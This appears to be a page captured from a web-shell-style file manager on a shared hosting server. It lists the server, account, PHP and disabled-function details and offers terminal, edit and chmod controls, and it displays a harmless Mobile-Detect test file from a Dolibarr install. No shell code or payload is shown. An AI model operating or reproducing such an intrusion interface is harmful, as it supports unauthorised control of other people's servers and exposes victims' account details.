🚀 Hostinger Optimized
🖥️ Server: Apache
💻 System: Linux webm015.cluster127.gra.hosting.ovh.net 6.18.42-ovh-vps-grsec-zfs+ #1 SMP PREEMPT_DYNAMIC Wed Aug 5 15:59:48 CEST 2026 x86_64
👤 User: stakrfrcol (69043)
🐘 PHP: 8.3.31
🚫 Disabled: _dyuweyrj4,_dyuweyrj4r,dl

💻 Terminal

📁 /home/stakrfrcol/agency
$

📄 UA_List.inc.php

📁 Path: /home/s/t/a/stakrfrcol/dolibarr/htdocs/includes/mobiledetect/mobiledetectlib/tests/UA_List.inc.php
📊 Size: 689 B
🔒 Perm: 0604
📝 MIME: text/x-php
<?php
/**
 * @license     MIT License https://github.com/serbanghita/Mobile-Detect/blob/master/LICENSE.txt
 * @link        http://mobiledetect.net
 *
 * Compile the providers list.
 * The providers list is updated weekly.
 * You can contribute by adding new user agents and tests.
 */

// Setup.
$includeBasePath = dirname(__FILE__) . '/providers/vendors';
$list = array();

// Scan.
$dir = new DirectoryIterator($includeBasePath);
foreach ($dir as $fileInfo) {
    if ($fileInfo->isDot()) {
        continue;
    }
    $listNew = include $includeBasePath . '/' . $fileInfo->getFilename();
    if (is_array($listNew)) {
        $list = array_merge($list, $listNew);
    }
}

return $list;
← Back📥 Raw✏️ Edit🔒 Chmod
✨ File Manager Magic ✨